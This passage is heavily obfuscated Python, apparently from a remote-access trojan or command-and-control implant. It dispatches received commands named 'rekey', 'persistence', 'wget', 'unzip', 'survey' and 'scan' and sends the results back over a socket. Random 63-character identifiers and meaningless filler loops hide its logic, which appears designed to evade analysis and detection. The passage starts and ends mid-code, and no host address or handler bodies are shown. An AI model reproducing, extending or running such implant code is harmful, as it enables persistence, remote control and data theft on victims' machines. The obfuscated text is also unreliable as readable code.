yxOzAHJAPtGPpSQyERJHwySSDAwxIuIOCOwxFJHDkJBCkDsPGHYHRCvPIxQyxGN = LAFSpsoxCuWxCiyQDmIDzAFPHCyARxmBRYbJooSpFkPDDRhJExPuJprsQQJIYP
else:
GrptwREQIxxsDNGHkeGESJQPDSFnpyjVtQDkHstwkJkvAlpmyFBDSvXOsuDPESh = HCtOsxzZIIyWZJvgqJzsmuECpvBvtxAPQaijvRAFwwypzFFBcGSBRPsIBHLqHHU
HxwHvBvAuGyRHsGvpSuwCSfFJRIPHwhyURHCLIDxjNxXPBlJyOlGJNMxwzfohSQ = HxwHvBvAuGyRHsGvpSuwCSfFJRIPHwhyURHCLIDxjNxXPBlJyOlGJNMxwzfohSQ.strip()
vIRwVSrRIoGDyAzHuoJjtNEGPQATAHFuAoCIjSvXYCAHcDGzOHiuVDIDtwoJGpy(IyQBkHZzzQArtBOPSywnHwuBSJeEvICCIFDvYpHJMEprXJpuBDhwGrPOUQyMyYE, HxwHvBvAuGyRHsGvpSuwCSfFJRIPHwhyURHCLIDxjNxXPBlJyOlGJNMxwzfohSQ, OEHyrENnDYkzJAIuCNBSRHxHyHHmxVnEGOPHyDPuWBCEHGvzvIGpMCQowNGtrSG)
elif qCDIlGZmYEEvlWHHSSxFPVQAdhJQwGEmGQrXGEiuVsEJIXtcEQoQDVtINvDmEzy == 'rekey':
LheBBgEnSyvFDxsrGXFCvCTBzVFiAqAvyZBPqPsxnxHwDGERADDBxCZQmPSuwwF = 'YRPxQgCSGQEjzWhrszySvXwBFePYGIjEkGnJvJHxEmvDPNSEyNCFcFsQslRSzFI'
CHJvEDDFnyoONoWjBxDwRDsFEuPYGQnMUIqwofOuFgmFDBuiyfwIFzSvJNGHqFI = 'xopFqIBxBwvWJJNBYwyumGgfPAGJouCFRFJCFwOTAFmDlzCNuylQqrCBwNBAOYG'
HImPCGyyzBQIJrzAvSIEtErGSORzEAGySyHHRXCHGZBCGJGsAhGtSvIOHOCJLOC = 'vEDFQHjumFXDrVCvKSqFJCSjRvBDsmHveTJADwQzRHwFJJBzAuSIHhGxPtjvyYx'
SJVHHqtlBPRbmFhINiDGsCEtzrQCozSspSzBJqOBUBFAGBGyGIkzJlNxTtJHGGv = 'nEMOlnHGQpiZHHwQQyOuvyAprGEqBNewoEPEbmAHAuQSvxlGFdCDEZRvmJJHywI'
if CHJvEDDFnyoONoWjBxDwRDsFEuPYGQnMUIqwofOuFgmFDBuiyfwIFzSvJNGHqFI == LheBBgEnSyvFDxsrGXFCvCTBzVFiAqAvyZBPqPsxnxHwDGERADDBxCZQmPSuwwF:
for LheBBgEnSyvFDxsrGXFCvCTBzVFiAqAvyZBPqPsxnxHwDGERADDBxCZQmPSuwwF in CHJvEDDFnyoONoWjBxDwRDsFEuPYGQnMUIqwofOuFgmFDBuiyfwIFzSvJNGHqFI:
if CHJvEDDFnyoONoWjBxDwRDsFEuPYGQnMUIqwofOuFgmFDBuiyfwIFzSvJNGHqFI == CHJvEDDFnyoONoWjBxDwRDsFEuPYGQnMUIqwofOuFgmFDBuiyfwIFzSvJNGHqFI:
HImPCGyyzBQIJrzAvSIEtErGSORzEAGySyHHRXCHGZBCGJGsAhGtSvIOHOCJLOC = 'SJVHHqtlBPRbmFhINiDGsCEtzrQCozSspSzBJqOBUBFAGBGyGIkzJlNxTtJHGGv'
elif HImPCGyyzBQIJrzAvSIEtErGSORzEAGySyHHRXCHGZBCGJGsAhGtSvIOHOCJLOC == SJVHHqtlBPRbmFhINiDGsCEtzrQCozSspSzBJqOBUBFAGBGyGIkzJlNxTtJHGGv:
SJVHHqtlBPRbmFhINiDGsCEtzrQCozSspSzBJqOBUBFAGBGyGIkzJlNxTtJHGGv = LheBBgEnSyvFDxsrGXFCvCTBzVFiAqAvyZBPqPsxnxHwDGERADDBxCZQmPSuwwF
else:
LheBBgEnSyvFDxsrGXFCvCTBzVFiAqAvyZBPqPsxnxHwDGERADDBxCZQmPSuwwF = CHJvEDDFnyoONoWjBxDwRDsFEuPYGQnMUIqwofOuFgmFDBuiyfwIFzSvJNGHqFI
elif HImPCGyyzBQIJrzAvSIEtErGSORzEAGySyHHRXCHGZBCGJGsAhGtSvIOHOCJLOC == HImPCGyyzBQIJrzAvSIEtErGSORzEAGySyHHRXCHGZBCGJGsAhGtSvIOHOCJLOC:
for HImPCGyyzBQIJrzAvSIEtErGSORzEAGySyHHRXCHGZBCGJGsAhGtSvIOHOCJLOC in CHJvEDDFnyoONoWjBxDwRDsFEuPYGQnMUIqwofOuFgmFDBuiyfwIFzSvJNGHqFI:
if SJVHHqtlBPRbmFhINiDGsCEtzrQCozSspSzBJqOBUBFAGBGyGIkzJlNxTtJHGGv == CHJvEDDFnyoONoWjBxDwRDsFEuPYGQnMUIqwofOuFgmFDBuiyfwIFzSvJNGHqFI:
HImPCGyyzBQIJrzAvSIEtErGSORzEAGySyHHRXCHGZBCGJGsAhGtSvIOHOCJLOC = 'SJVHHqtlBPRbmFhINiDGsCEtzrQCozSspSzBJqOBUBFAGBGyGIkzJlNxTtJHGGv'
elif HImPCGyyzBQIJrzAvSIEtErGSORzEAGySyHHRXCHGZBCGJGsAhGtSvIOHOCJLOC == SJVHHqtlBPRbmFhINiDGsCEtzrQCozSspSzBJqOBUBFAGBGyGIkzJlNxTtJHGGv:
SJVHHqtlBPRbmFhINiDGsCEtzrQCozSspSzBJqOBUBFAGBGyGIkzJlNxTtJHGGv = LheBBgEnSyvFDxsrGXFCvCTBzVFiAqAvyZBPqPsxnxHwDGERADDBxCZQmPSuwwF
else:
LheBBgEnSyvFDxsrGXFCvCTBzVFiAqAvyZBPqPsxnxHwDGERADDBxCZQmPSuwwF = CHJvEDDFnyoONoWjBxDwRDsFEuPYGQnMUIqwofOuFgmFDBuiyfwIFzSvJNGHqFI
for HImPCGyyzBQIJrzAvSIEtErGSORzEAGySyHHRXCHGZBCGJGsAhGtSvIOHOCJLOC in CHJvEDDFnyoONoWjBxDwRDsFEuPYGQnMUIqwofOuFgmFDBuiyfwIFzSvJNGHqFI:
if SJVHHqtlBPRbmFhINiDGsCEtzrQCozSspSzBJqOBUBFAGBGyGIkzJlNxTtJHGGv == CHJvEDDFnyoONoWjBxDwRDsFEuPYGQnMUIqwofOuFgmFDBuiyfwIFzSvJNGHqFI:
HImPCGyyzBQIJrzAvSIEtErGSORzEAGySyHHRXCHGZBCGJGsAhGtSvIOHOCJLOC = 'SJVHHqtlBPRbmFhINiDGsCEtzrQCozSspSzBJqOBUBFAGBGyGIkzJlNxTtJHGGv'
elif HImPCGyyzBQIJrzAvSIEtErGSORzEAGySyHHRXCHGZBCGJGsAhGtSvIOHOCJLOC == SJVHHqtlBPRbmFhINiDGsCEtzrQCozSspSzBJqOBUBFAGBGyGIkzJlNxTtJHGGv:
SJVHHqtlBPRbmFhINiDGsCEtzrQCozSspSzBJqOBUBFAGBGyGIkzJlNxTtJHGGv = LheBBgEnSyvFDxsrGXFCvCTBzVFiAqAvyZBPqPsxnxHwDGERADDBxCZQmPSuwwF
else:
LheBBgEnSyvFDxsrGXFCvCTBzVFiAqAvyZBPqPsxnxHwDGERADDBxCZQmPSuwwF = SJVHHqtlBPRbmFhINiDGsCEtzrQCozSspSzBJqOBUBFAGBGyGIkzJlNxTtJHGGv
else:
LheBBgEnSyvFDxsrGXFCvCTBzVFiAqAvyZBPqPsxnxHwDGERADDBxCZQmPSuwwF = CHJvEDDFnyoONoWjBxDwRDsFEuPYGQnMUIqwofOuFgmFDBuiyfwIFzSvJNGHqFI
OEHyrENnDYkzJAIuCNBSRHxHyHHmxVnEGOPHyDPuWBCEHGvzvIGpMCQowNGtrSG = vtMRvNIZLQjyJnDNOMACSDDwRCSJsDWOiDOCIESrasNPSuqDRsJHTwoEvItFRqw(IyQBkHZzzQArtBOPSywnHwuBSJeEvICCIFDvYpHJMEprXJpuBDhwGrPOUQyMyYE)
elif qCDIlGZmYEEvlWHHSSxFPVQAdhJQwGEmGQrXGEiuVsEJIXtcEQoQDVtINvDmEzy == 'persistence':
JIHHyrVIkOepptFZnjIyIDAOwlYQnCSOJNzASAzMnIWgeIvuPAQtJpsDquwfjNS = 'GJHrOzPIvQqWvXFRAHQSIiwSnvDrsCsvOARsSwhGziNpyojCQsqSqAHwHSBMnRk'
vgJJJhnfyLkJskilRGRAuzcqSAQFSWFqOCDBFSBtDzAqqDxRBpOuSFBsvJfJQR = 'AwDFzCsGFjzGACEOmySDwQCiEyJPzCGRFYtIEJEvwIHGbLxPCGxzzEwzIyqDimj'
HDPQQMFmJrylEYDBFsistwJqntFHBJRmQHHzMuoHODsQHwuzzBFTRgDRGCBwXwG = 'SOaIJCzCzCzDsyCQxvqvvMzyqNssyRPhQSSPQeznJjwFDpDFUDSxzoySJQRSBzz'
IPSPPCtASuDAqzRyzASuEAmyRFEynItoDzxzWNeCZyQjuErvADuvUztIPODMRAD = 'GtzHAkDxFYVBOsIRwSjXqGtnQHkxElvzJHzNsoewuEoYARIqzOpFAISxGJrtIJJ'
REFFxrQCLkvNWRxCmyvwCFhztzoIvPJjEmBxJlJopGFBQMSylRuqnAypGJziGwk = 'uzASCIsSFxvIjkwMyBuojmFegEGzFyCwDBttpSwdrvjpEzAGExCnxuEBkODtPQt'
if JIHHyrVIkOepptFZnjIyIDAOwlYQnCSOJNzASAzMnIWgeIvuPAQtJpsDquwfjNS in vgJJJhnfyLkJskilRGRAuzcqSAQFSWFqOCDBFSBtDzAqqDxRBpOuSFBsvJfJQR:
JIHHyrVIkOepptFZnjIyIDAOwlYQnCSOJNzASAzMnIWgeIvuPAQtJpsDquwfjNS = REFFxrQCLkvNWRxCmyvwCFhztzoIvPJjEmBxJlJopGFBQMSylRuqnAypGJziGwk
if vgJJJhnfyLkJskilRGRAuzcqSAQFSWFqOCDBFSBtDzAqqDxRBpOuSFBsvJfJQR in HDPQQMFmJrylEYDBFsistwJqntFHBJRmQHHzMuoHODsQHwuzzBFTRgDRGCBwXwG:
vgJJJhnfyLkJskilRGRAuzcqSAQFSWFqOCDBFSBtDzAqqDxRBpOuSFBsvJfJQR = IPSPPCtASuDAqzRyzASuEAmyRFEynItoDzxzWNeCZyQjuErvADuvUztIPODMRAD
elif vgJJJhnfyLkJskilRGRAuzcqSAQFSWFqOCDBFSBtDzAqqDxRBpOuSFBsvJfJQR in JIHHyrVIkOepptFZnjIyIDAOwlYQnCSOJNzASAzMnIWgeIvuPAQtJpsDquwfjNS:
HDPQQMFmJrylEYDBFsistwJqntFHBJRmQHHzMuoHODsQHwuzzBFTRgDRGCBwXwG = vgJJJhnfyLkJskilRGRAuzcqSAQFSWFqOCDBFSBtDzAqqDxRBpOuSFBsvJfJQR
if HDPQQMFmJrylEYDBFsistwJqntFHBJRmQHHzMuoHODsQHwuzzBFTRgDRGCBwXwG in vgJJJhnfyLkJskilRGRAuzcqSAQFSWFqOCDBFSBtDzAqqDxRBpOuSFBsvJfJQR:
vgJJJhnfyLkJskilRGRAuzcqSAQFSWFqOCDBFSBtDzAqqDxRBpOuSFBsvJfJQR = REFFxrQCLkvNWRxCmyvwCFhztzoIvPJjEmBxJlJopGFBQMSylRuqnAypGJziGwk
RsZDxLqMFNFmOtTxGAIxJEJPCSSCFkDRvtwQtHEotQQLxrIIPrZIefgnhNpRPSz = GuHDlyvuyMYuBAOtBAoPLYEGnaoPxOQUqfGYkfnEGXzwIHOCMmuuwFjwmqQQFVu(nwsJDSFGtvBSQFxsVSBNEBFkDIeEvfqNEHJStBDIEFuGcCSvRuFGFBOGTCtIxyJ)
IyQBkHZzzQArtBOPSywnHwuBSJeEvICCIFDvYpHJMEprXJpuBDhwGrPOUQyMyYE.send(SPuftCNRrBmEOHCGpJsNAREOsyuxkCNDSBrSxGriSZOARHCTADxEyFHFPgOgFtg(RsZDxLqMFNFmOtTxGAIxJEJPCSSCFkDRvtwQtHEotQQLxrIIPrZIefgnhNpRPSz, OEHyrENnDYkzJAIuCNBSRHxHyHHmxVnEGOPHyDPuWBCEHGvzvIGpMCQowNGtrSG))
elif qCDIlGZmYEEvlWHHSSxFPVQAdhJQwGEmGQrXGEiuVsEJIXtcEQoQDVtINvDmEzy == 'wget':
try:
IHPCZQhQCRsARRTREJOnIHAFwCFoGRxEJpIUGHpEPSPyJBFBPruCLvWOszCJtjq = 'HPeFnEpBuzkvmmJIRIChUqPNzSQFuMTuJTGwJnBPWvWSAAPnDymkGUxfmsFvOlQ'
rpQWJoqPozCizwDEavxFxOuGDvRSzQiuUSAqBbPCSCyDBACyRvAgCyrYqVjIBRJ = 'ZOTCiFImprRXJPSFIDzDERDvSxBLDDxeqBxEAwFPyQFrDMGxQkESFQqGzAvMAMp'
PGsrcIJvmBBEFsAZCMuIQDNJwPtpxDJBvDFSSrsPsCmhuFzLGqRWJAyDwzEyjrL = 'NBFSIOtVYJzGQDCQJzHANrRuiIiuyJHJROSBUutrISxQrNuXbHOJNrWmOvHImG'
RxOSsgyMDBtREEESQICgisGyJEJMvsIlPXxSSOyZISZHyIxrGRrInGODnCSGDGv = 'GhnvrEJPqxwptACEyIZIzOxrvVCCPnSAiLBhZSDWuuJDCpHuzJGgyGJpCRAoRJZ'
MRHAHRMWuveSRFCFnDGyHfIByOFoOxHtesmMAdFwrIpzGDJHLRpCuDmqyxOsFcr = 'QlnhvnNFSSOOiMPIJkCIDPDwmyHRxxNRJJdBkIpJmWGdteHAAHyPpqOFSGHyPpz'
SSwUHPxooVtwWzwQHkCvtHCQnQVgCRAOCVAMRoACjQfDdDSnHsqFTCoCnHzZlxD = 'DEYHFSySAuzBTqFmCOwQqNIAHxSNZHxIFiJzqzmBAxIHPBJsixyIPtQtRQPsxAI'
EStBIXXOHkGCEiePoUuEtEzPiHIASBFCJoIQviVkQwrspFDxhwCRIlTHnvmCgPr = [
'HPeFnEpBuzkvmmJIRIChUqPNzSQFuMTuJTGwJnBPWvWSAAPnDymkGUxfmsFvOlQ',
'NBFSIOtVYJzGQDCQJzHANrRuiIiuyJHJROSBUutrISxQrNuXbHOJNrWmOvHImG',
'QlnhvnNFSSOOiMPIJkCIDPDwmyHRxxNRJJdBkIpJmWGdteHAAHyPpqOFSGHyPpz',
'vBqAmGCsoSzhRrHnQRJFwvypFRCUoDFODeRxYkOwQJwwNwClRHGGRzXFGHTqToE'
]
for IHPCZQhQCRsARRTREJOnIHAFwCFoGRxEJpIUGHpEPSPyJBFBPruCLvWOszCJtjq in SSwUHPxooVtwWzwQHkCvtHCQnQVgCRAOCVAMRoACjQfDdDSnHsqFTCoCnHzZlxD:
for rpQWJoqPozCizwDEavxFxOuGDvRSzQiuUSAqBbPCSCyDBACyRvAgCyrYqVjIBRJ in PGsrcIJvmBBEFsAZCMuIQDNJwPtpxDJBvDFSSrsPsCmhuFzLGqRWJAyDwzEyjrL:
if RxOSsgyMDBtREEESQICgisGyJEJMvsIlPXxSSOyZISZHyIxrGRrInGODnCSGDGv == MRHAHRMWuveSRFCFnDGyHfIByOFoOxHtesmMAdFwrIpzGDJHLRpCuDmqyxOsFcr:
rpQWJoqPozCizwDEavxFxOuGDvRSzQiuUSAqBbPCSCyDBACyRvAgCyrYqVjIBRJ = IHPCZQhQCRsARRTREJOnIHAFwCFoGRxEJpIUGHpEPSPyJBFBPruCLvWOszCJtjq
elif MRHAHRMWuveSRFCFnDGyHfIByOFoOxHtesmMAdFwrIpzGDJHLRpCuDmqyxOsFcr == rpQWJoqPozCizwDEavxFxOuGDvRSzQiuUSAqBbPCSCyDBACyRvAgCyrYqVjIBRJ:
rpQWJoqPozCizwDEavxFxOuGDvRSzQiuUSAqBbPCSCyDBACyRvAgCyrYqVjIBRJ = SSwUHPxooVtwWzwQHkCvtHCQnQVgCRAOCVAMRoACjQfDdDSnHsqFTCoCnHzZlxD
else:
MRHAHRMWuveSRFCFnDGyHfIByOFoOxHtesmMAdFwrIpzGDJHLRpCuDmqyxOsFcr = SSwUHPxooVtwWzwQHkCvtHCQnQVgCRAOCVAMRoACjQfDdDSnHsqFTCoCnHzZlxD
for rpQWJoqPozCizwDEavxFxOuGDvRSzQiuUSAqBbPCSCyDBACyRvAgCyrYqVjIBRJ in EStBIXXOHkGCEiePoUuEtEzPiHIASBFCJoIQviVkQwrspFDxhwCRIlTHnvmCgPr:
PGsrcIJvmBBEFsAZCMuIQDNJwPtpxDJBvDFSSrsPsCmhuFzLGqRWJAyDwzEyjrL = rpQWJoqPozCizwDEavxFxOuGDvRSzQiuUSAqBbPCSCyDBACyRvAgCyrYqVjIBRJ
except Exception:
pass
RsZDxLqMFNFmOtTxGAIxJEJPCSSCFkDRvtwQtHEotQQLxrIIPrZIefgnhNpRPSz = BwtroWhMwUAJNCIxRHzhDBTSCJpUovQxSozAwFoJQVyMQrvQGDCJOCEBlQCVMfA(action)
IyQBkHZzzQArtBOPSywnHwuBSJeEvICCIFDvYpHJMEprXJpuBDhwGrPOUQyMyYE.send(SPuftCNRrBmEOHCGpJsNAREOsyuxkCNDSBrSxGriSZOARHCTADxEyFHFPgOgFtg(RsZDxLqMFNFmOtTxGAIxJEJPCSSCFkDRvtwQtHEotQQLxrIIPrZIefgnhNpRPSz, OEHyrENnDYkzJAIuCNBSRHxHyHHmxVnEGOPHyDPuWBCEHGvzvIGpMCQowNGtrSG))
elif qCDIlGZmYEEvlWHHSSxFPVQAdhJQwGEmGQrXGEiuVsEJIXtcEQoQDVtINvDmEzy == 'unzip':
xTFPGpxxqAnFNJAJQDdiSyJxGsQPvJGvYytErBHouDCExDIxswDqwsNlEKmRSzA = 'IPYmmDApGpHDJuIDzPUyFIErBtFnoPvTGwGCPJvEGtCwPESnHFSSntelypSJqFS'
EDNmwEIToFONuTQPbNHOGJzHDvCZomFtrJDzlwnxQfXIyHFJEFqGYPIOpfSCFV = 'XDpCMpBGCADaCuZSpGDGJORBRRGJAUITlGVIFJIfDJJFFlIxZDHSGIRrYmAIQmm'
RBGGPywMFpFJQsJHElIPGqGcwHiuQFvynqQhUEiNIDXEkylBgzHwIDjzCMrIzzv = 'MPFEJzBxwylNAQpBItTBuAHxExJOiByJIyDSRfCCmIJqGGNObRHIWXYRrEyArsv'
if xTFPGpxxqAnFNJAJQDdiSyJxGsQPvJGvYytErBHouDCExDIxswDqwsNlEKmRSzA == EDNmwEIToFONuTQPbNHOGJzHDvCZomFtrJDzlwnxQfXIyHFJEFqGYPIOpfSCFV:
RBGGPywMFpFJQsJHElIPGqGcwHiuQFvynqQhUEiNIDXEkylBgzHwIDjzCMrIzzv = 'MPFEJzBxwylNAQpBItTBuAHxExJOiByJIyDSRfCCmIJqGGNObRHIWXYRrEyArsv'
RBGGPywMFpFJQsJHElIPGqGcwHiuQFvynqQhUEiNIDXEkylBgzHwIDjzCMrIzzv = xTFPGpxxqAnFNJAJQDdiSyJxGsQPvJGvYytErBHouDCExDIxswDqwsNlEKmRSzA
else:
RBGGPywMFpFJQsJHElIPGqGcwHiuQFvynqQhUEiNIDXEkylBgzHwIDjzCMrIzzv = 'MPFEJzBxwylNAQpBItTBuAHxExJOiByJIyDSRfCCmIJqGGNObRHIWXYRrEyArsv'
RBGGPywMFpFJQsJHElIPGqGcwHiuQFvynqQhUEiNIDXEkylBgzHwIDjzCMrIzzv = 'IPYmmDApGpHDJuIDzPUyFIErBtFnoPvTGwGCPJvEGtCwPESnHFSSntelypSJqFS'
RsZDxLqMFNFmOtTxGAIxJEJPCSSCFkDRvtwQtHEotQQLxrIIPrZIefgnhNpRPSz = GDksjjtSttQJGqJCSHBpJxAJSRDrJIDqHDEJwJyFDxQMvxxSnWJyzVqRauBigxx(action)
IyQBkHZzzQArtBOPSywnHwuBSJeEvICCIFDvYpHJMEprXJpuBDhwGrPOUQyMyYE.send(SPuftCNRrBmEOHCGpJsNAREOsyuxkCNDSBrSxGriSZOARHCTADxEyFHFPgOgFtg(RsZDxLqMFNFmOtTxGAIxJEJPCSSCFkDRvtwQtHEotQQLxrIIPrZIefgnhNpRPSz, OEHyrENnDYkzJAIuCNBSRHxHyHHmxVnEGOPHyDPuWBCEHGvzvIGpMCQowNGtrSG))
elif qCDIlGZmYEEvlWHHSSxFPVQAdhJQwGEmGQrXGEiuVsEJIXtcEQoQDVtINvDmEzy == 'survey':
AYHHpASDvPIGoURPxzGVsItGSSIDFkGFoJmRpTsFRFPiYjZGCImEFyCxQWtuSEJ = 'QAGqucjBZBDVRVDIzShoQEvJDOYmrMQwqCqwMFDXHSvrBADNjXEtGFsBJHNpCFy'
BwDCjqnvySQrwjwBwCSHIJFlGDAqLCPyNVvHtQsExmJEzCJIJyZVwQSMPfqvnnP = 'JTEoQBPPDxlHCzfFmMAnusEeOHOvkFPJNwHFRlGmByHNISSzruJGkAxJfLYHtoj'
BoBFtpsquGDCvqDzHBOJJXPlNRvWhBGvNTzSFJeoQASnPxlVFJztoBCgOfHAFDt = 'tEgEuHGRRsSIpptqeyMIQARxsAlbBMzNSSHyYHHAJCGESwqRxzHIQRPBsyyhrAD'
ERyZDFHErTuHFFzDAVDSzFJSGICFLDFTJDCNPpbiBBQmsAbHysIFfvtSnyHiRIS = 'PGDutFDPGDABYJWDHGyIMsSOCRtstqWNCezsBAnPFATgCACRnIDDGAIFznEZHPC'
LTCGqBRezvqpCIARSIDDxOALFxhhtuHHetPPpGmwCHSFYRlBSsPLFyqYYROyZMJ = 'JnRSwPzwJBZxsVquwEzPxIFdqCGIwxMTwSCxIHSJNDiVWGtjsyHRILsyRwIeuf'
hxjnGTRMsGUDzSuwKIeRkvERIlHsMyuFSpUNDneRAsCqDqPUEiHzQIJHHJBJfJ = 'EBCgrkLpblOlvZFEGrvlHoMsvGFzDQJzivxePBqICBRhOnvRCEFLAHAQPJRBArF'
if AYHHpASDvPIGoURPxzGVsItGSSIDFkGFoJmRpTsFRFPiYjZGCImEFyCxQWtuSEJ != ERyZDFHErTuHFFzDAVDSzFJSGICFLDFTJDCNPpbiBBQmsAbHysIFfvtSnyHiRIS:
BwDCjqnvySQrwjwBwCSHIJFlGDAqLCPyNVvHtQsExmJEzCJIJyZVwQSMPfqvnnP = BoBFtpsquGDCvqDzHBOJJXPlNRvWhBGvNTzSFJeoQASnPxlVFJztoBCgOfHAFDt
for hxjnGTRMsGUDzSuwKIeRkvERIlHsMyuFSpUNDneRAsCqDqPUEiHzQIJHHJBJfJ in ERyZDFHErTuHFFzDAVDSzFJSGICFLDFTJDCNPpbiBBQmsAbHysIFfvtSnyHiRIS:
if hxjnGTRMsGUDzSuwKIeRkvERIlHsMyuFSpUNDneRAsCqDqPUEiHzQIJHHJBJfJ != BoBFtpsquGDCvqDzHBOJJXPlNRvWhBGvNTzSFJeoQASnPxlVFJztoBCgOfHAFDt:
BwDCjqnvySQrwjwBwCSHIJFlGDAqLCPyNVvHtQsExmJEzCJIJyZVwQSMPfqvnnP = BwDCjqnvySQrwjwBwCSHIJFlGDAqLCPyNVvHtQsExmJEzCJIJyZVwQSMPfqvnnP
else:
LTCGqBRezvqpCIARSIDDxOALFxhhtuHHetPPpGmwCHSFYRlBSsPLFyqYYROyZMJ = AYHHpASDvPIGoURPxzGVsItGSSIDFkGFoJmRpTsFRFPiYjZGCImEFyCxQWtuSEJ
else:
BoBFtpsquGDCvqDzHBOJJXPlNRvWhBGvNTzSFJeoQASnPxlVFJztoBCgOfHAFDt = AYHHpASDvPIGoURPxzGVsItGSSIDFkGFoJmRpTsFRFPiYjZGCImEFyCxQWtuSEJ
AYHHpASDvPIGoURPxzGVsItGSSIDFkGFoJmRpTsFRFPiYjZGCImEFyCxQWtuSEJ = LTCGqBRezvqpCIARSIDDxOALFxhhtuHHetPPpGmwCHSFYRlBSsPLFyqYYROyZMJ
if BoBFtpsquGDCvqDzHBOJJXPlNRvWhBGvNTzSFJeoQASnPxlVFJztoBCgOfHAFDt == AYHHpASDvPIGoURPxzGVsItGSSIDFkGFoJmRpTsFRFPiYjZGCImEFyCxQWtuSEJ:
for hxjnGTRMsGUDzSuwKIeRkvERIlHsMyuFSpUNDneRAsCqDqPUEiHzQIJHHJBJfJ in AYHHpASDvPIGoURPxzGVsItGSSIDFkGFoJmRpTsFRFPiYjZGCImEFyCxQWtuSEJ:
if hxjnGTRMsGUDzSuwKIeRkvERIlHsMyuFSpUNDneRAsCqDqPUEiHzQIJHHJBJfJ == BoBFtpsquGDCvqDzHBOJJXPlNRvWhBGvNTzSFJeoQASnPxlVFJztoBCgOfHAFDt:
BoBFtpsquGDCvqDzHBOJJXPlNRvWhBGvNTzSFJeoQASnPxlVFJztoBCgOfHAFDt = AYHHpASDvPIGoURPxzGVsItGSSIDFkGFoJmRpTsFRFPiYjZGCImEFyCxQWtuSEJ
else:
BoBFtpsquGDCvqDzHBOJJXPlNRvWhBGvNTzSFJeoQASnPxlVFJztoBCgOfHAFDt = LTCGqBRezvqpCIARSIDDxOALFxhhtuHHetPPpGmwCHSFYRlBSsPLFyqYYROyZMJ
RsZDxLqMFNFmOtTxGAIxJEJPCSSCFkDRvtwQtHEotQQLxrIIPrZIefgnhNpRPSz = GuHDlyvuyMYuBAOtBAoPLYEGnaoPxOQUqfGYkfnEGXzwIHOCMmuuwFjwmqQQFVu(nwsJDSFGtvBSQFxsVSBNEBFkDIeEvfqNEHJStBDIEFuGcCSvRuFGFBOGTCtIxyJ)
IyQBkHZzzQArtBOPSywnHwuBSJeEvICCIFDvYpHJMEprXJpuBDhwGrPOUQyMyYE.send(SPuftCNRrBmEOHCGpJsNAREOsyuxkCNDSBrSxGriSZOARHCTADxEyFHFPgOgFtg(RsZDxLqMFNFmOtTxGAIxJEJPCSSCFkDRvtwQtHEotQQLxrIIPrZIefgnhNpRPSz, OEHyrENnDYkzJAIuCNBSRHxHyHHmxVnEGOPHyDPuWBCEHGvzvIGpMCQowNGtrSG))
elif qCDIlGZmYEEvlWHHSSxFPVQAdhJQwGEmGQrXGEiuVsEJIXtcEQoQDVtINvDmEzy == 'scan':
AkIeQwFtrhInzRGyAQzEGrSzHEXKzSCzQwCHzwAGzPHgOJkGIDvfkpwRpquIEkE = 'BTYiFCByPQxnYCCDkVEvNIBkqQVyjAivwqyQjQHhNwWVDwPHsDyJvGpntwtrJAm'
xJcIsIryPPtItJnIJSnLJRPHHYHzZQzolRxSUCWOvvOyCRpREPxuCtwBMREGGI = 'jqoDziwshRpJFGGulPTDUJsDRjGvXIGoRwuLPxMTVIBkJXCHBEuzvkxzaIooSqu'
if AkIeQwFtrhInzRGyAQzEGrSzHEXKzSCzQwCHzwAGzPHgOJkGIDvfkpwRpquIEkE != xJcIsIryPPtItJnIJSnLJRPHHYHzZQzolRxSUCWOvvOyCRpREPxuCtwBMREGGI:
AkIeQwFtrhInzRGyAQzEGrSzHEXKzSCzQwCHzwAGzPHgOJkGIDvfkpwRpquIEkE = 'jqoDziwshRpJFGGulPTDUJsDRjGvXIGoRwuLPxMTVIBkJXCHBEuzvkxzaIooSqu'
xJcIsIryPPtItJnIJSnLJRPHHYHzZQzolRxSUCWOvvOyCRpREPxuCtwBMREGGI = AkIeQwFtrhInzRGyAQzEGrSzHEXKzSCzQwCHzwAGzPHgOJkGIDvfkpwRpquIEkE
AkIeQwFtrhInzRGyAQzEGrSzHEXKzSCzQwCHzwAGzPHgOJkGIDvfkpwRpquIEkE = 'BTYiFCByPQxnYCCDkVEvNIBkqQVyjAivwqyQjQHhNwWVDwPHsDyJvGpntwtrJAm'
RsZDxLqMFNFmOtTxGAIxJEJPCSSCFkDRvtwQtHEotQQLxrIIPrZIefgnhNpRPSz = HCEwqSIvzuVuOsqtHkJSBDxBGyvADGEjjJGIDlvrESExqlHvSQSszJEkDPJGOBQ(action)
IyQBkHZzzQArtBOPSywnHwuBSJeEvICCIFDvYpHJMEprXJpuBDhwGrPOUQyMyYE.send(SPuftCNRrBmEOHCGpJsNAREOsyuxkCNDSBrSxGriSZOARHCTADxEyFHFPgOgFtg(RsZDxLqMFNFmOtTxGAIxJEJPCSSCFkDRvtwQtHEotQQLxrIIPrZIefgnhNpRPSz, OEHyrENnDYkzJAIuCNBSRHxHyHHmxVnEGOPHyDPuWBCEHGvzvIGpMCQowNGtrSG))
if __name__ == '__main__':
QCWfQifxmjwHNkqhvnExHEuymnGYqHFSODFpZFQSkhpQDLDGxGEBEAyNwEivoSJ = 'BiXAsAGtySJhFpAMxEfvysvhDOHCIyqIGlSAQPJOJoCzzYrZAmxtmwBAHRzzqpE'
vGtHHqwmpzSJANPxFEpEUILStsIWvxEvILswrUQCnEHAHHEhXEyyUtrRjxxXxsx = 'oyFlgGRGBBzPuPHhPFACIQmEyDmjiGPXGqvPArPJsOlGQxSeuTvuJCCDmxAgIBu'
jHsJgDHRLRSurHIuGRvDCEtIPjxOOIOYxRyqwOHrqQiSFBGDOFtjIIBCVyGCMRC = 'tDIjJGFQBIIIIkMGysIIxQJyHiSxgEqqVxJJmAHErtuSQIsyzoHRlAvUzSBJpHp'
tFUPHnwlINDuyCIAzmPCJpAgRrbDCIiBBRIQFPSAFIBWOIQzuUzHSuvvCeGJqRA = 'JHsFpPPFvIwYxPxSJVGAZrpxCFEPZWJudnPFBulvYDDiRHPGquEBPPsEOFQtDOx'
gvEjBJHSxOCFwSJUJGBHfRFmxIPtUzquDkAyxwRRYovHJxtDDJAaqyRFzNODSMS = 'JFAXHSRHPQEuQZHBXAHBXjAxHlzTwJEHEzlExSGfxGSlsdFyFwHYzymSNttHouI'
if QCWfQifxmjwHNkqhvnExHEuymnGYqHFSODFpZFQSkhpQDLDGxGEBEAyNwEivoSJ in vGtHHqwmpzSJANPxFEpEUILStsIWvxEvILswrUQCnEHAHHEhXEyyUtrRjxxXxsx:
